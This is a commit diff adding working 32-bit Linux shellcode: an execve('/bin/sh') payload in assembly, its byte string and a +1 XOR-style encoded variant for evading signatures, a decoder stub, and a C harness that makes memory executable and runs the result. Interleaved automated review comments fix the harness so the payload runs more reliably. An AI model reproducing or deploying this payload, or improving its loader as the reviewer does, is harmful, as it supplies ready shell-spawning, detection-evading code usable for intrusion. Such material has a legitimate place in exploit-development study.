Commit 5999dc0

committed
update
1 parent 78111fd commit 5999dc0


4 files changed

+91
-0
lines changed

4 files changed

+91
-0
lines changed

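--- a/32/polymorphic_sh/sh_shellcode.asm
+++ b/32/polymorphic_sh/sh_shellcode.asm
@@ -0,0 +1,36 @@
+;Shellcode execve(/bin/sh, NULL, NULL) polymorphic
+[SECTION .text]
+
+global _start
+
+_shellcode_start:
+
+xoreax,eax ; clear EAX
+
+; prepare first argument of execve /bin/sh in EBX
+
+pusheax ; NULL byte
+push0x68732f2f ; //sh
+push0x6e69622f ; /bin
+movebx,esp ; ptr to /bin/sh
+
+; prepare second argument of execve NULL in ECX
+
+xorecx,ecx
+
+; prepare third argument of execve NULL in EDX
+
+xoredx,edx
+
+; syscall execve(/bin/sh, NULL, NULL)
+
+moval,0xb ; Syscall 11 execve
+int0x80 ; Syscall
+
+; exit 0 syscall
+
+xoreax,eax ; clear EAX
+moval,1 ; Syscall 1 exit
+xorebx,ebx ; clear EBX
+int0x80 ; Syscall
+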
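Review bot: The file declares `global _start` on line 4 but the only label it defines is `_shellcode_start:` on line 6, so assembling and linking this unit by itself leaves `_start` undefined and the linker falls back to a default entry point; either rename the label to `_start:` or change the directive to `global _shellcode_start`. The block headed `; exit 0 syscall` from line 30 is only reached when the `execve` call at line 28 returns, which it does only on failure, so the heading is misleading and `; fallback: exit(0) if execve fails` describes what actually happens. The `; Syscall 11 execve` / `; Syscall 1 exit` comments would read better as named constants (`SYS_EXECVE equ 11`, `SYS_EXIT equ 1`) than as magic immediates. The missing separators between mnemonic and operands (`xoreax,eax`, `push0x68732f2f`) look like a rendering artifact of this page rather than the committed text, so I have not treated them as a defect.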

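--- a/32/polymorphic_sh/sh_shellcode.hex.enc
+++ b/32/polymorphic_sh/sh_shellcode.hex.enc
@@ -0,0 +1,7 @@
+Shellcode /bin/sh execve
+
+\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80
+
+Encoded Shellcode /bin/sh execve polymorphic +1 for each bytes
+
+\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x32\xca\x32\xd3\xb1\x0c\xce\x81\x32\xc1\xb1\x02\x32\xdc\xce\x81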

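--- a/32/polymorphic_sh/shellcode_decoder.asm
+++ b/32/polymorphic_sh/shellcode_decoder.asm
@@ -0,0 +1,26 @@
+[SECTION .text]
+
+global_start
+
+_start:
+
+jmp short initialize
+
+handlemySC:
+
+popesi
+xorecx,ecx
+movcl,31 ; shellcode size
+
+decode:
+
+sub byte [esi+ecx-1],1
+subcl,1
+jnz decode
+jmp short execmySC
+
+initialize:
+
+call handlemySC
+
+execmySC: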

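--- a/32/polymorphic_sh/shellcode_executor.c
+++ b/32/polymorphic_sh/shellcode_executor.c
@@ -0,0 +1,22 @@
+#include <stdio.h>
+#include <sys/mman.h>
+#include <stdint.h>
+#include <string.h>
+
+typedef void pf_t(void);
+
+char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x1f\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x32\xca\x32\xd3\xb1\x0c\xce\x81\x32\xc1\xb1\x02\x32\xdc\xce\x81";
+
+// decoder_shellcode + bin_sh_shellcode_encoded
+
+int main(){
+
+printf("Shellcode length : %d bytes", strlen(shellcode));
+// Prints shellcode length in bytes
+mprotect((pf_t*)((uint64_t)shellcode & ~4095), 4096, 0x6);
+// PROT_EXEC | PROC_WRITE on page that contains the shellcode
+((pf_t*) shellcode)();
+// Execute the shellcode
+return 0;
+
+}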
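Review bot: `printf("... %d", strlen(shellcode))` on line 14 passes a `size_t` to a `%d` conversion, which is undefined behaviour and prints garbage on LP64 targets; it should be `%zu`, and `sizeof(shellcode) - 1` is the length that is actually in the array, whereas `strlen` would silently stop at any NUL byte the payload might contain. The `mprotect` call on line 16 hard-codes the page size and the flag value `0x6` (which is `PROT_WRITE | PROT_EXEC` without `PROT_READ`, not what the comment on line 17 says), casts the address to `pf_t*` instead of `void *`, and never checks the return value, so a failed call is followed by a jump into non-executable memory with no diagnostic; use the named `PROT_*` constants, `sysconf(_SC_PAGESIZE)` from `<unistd.h>`, and `perror` on failure. The pointer is rounded through `uint64_t`, which assumes a 64-bit build, yet the decoder in `shellcode_decoder.asm` uses `int 0x80` and 32-bit registers, so this harness presumably has to be compiled as a 32-bit executable; `uintptr_t` is the correct integer type either way and a comment stating the intended target would spare the next reader the guess. A buffer that straddles a page boundary is also not covered by a single fixed 4096-byte range, so the protected span should be derived from the buffer's start and length.
```c
int main(void){
    /* … unchanged: shellcode[] definition above … */
    size_t len = sizeof(shellcode) - 1;            /* bytes actually present, NUL-safe */
    uintptr_t page = (uintptr_t)sysconf(_SC_PAGESIZE);
    uintptr_t base = (uintptr_t)shellcode & ~(page - 1);
    uintptr_t end  = ((uintptr_t)shellcode + len + page - 1) & ~(page - 1);

    printf("Shellcode length : %zu bytes\n", len);

    /* the decoder stub rewrites its payload in place, so the page must be writable as well as executable */
    if (mprotect((void *)base, (size_t)(end - base), PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
        perror("mprotect");
        return 1;
    }
    ((pf_t*) shellcode)();
    return 0;
}
```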
